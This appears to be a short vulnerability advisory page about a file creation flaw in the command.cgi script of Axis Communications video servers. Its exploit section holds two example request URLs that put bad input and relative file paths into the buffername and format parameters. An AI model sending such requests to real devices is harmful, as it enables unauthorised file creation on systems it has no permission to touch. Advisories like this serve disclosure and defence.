Axis Communications Video Server Command.CGI File Creation Vulnerability

info
discussion
exploit
solution
references

Axis Communications Video Server Command.CGI File Creation Vulnerability

http://www.example.com/axis-cgi/buffer/command.cgi?buffername=X&prealarm=1&postalarm=1&do=start&uri=/jpg/quad.jpg&format=[bad input]

http://www.example.com/axis-cgi/buffer/command.cgi?whatever paramsbuffername=[relative path to directory]format=[relative path to arbitrary file name]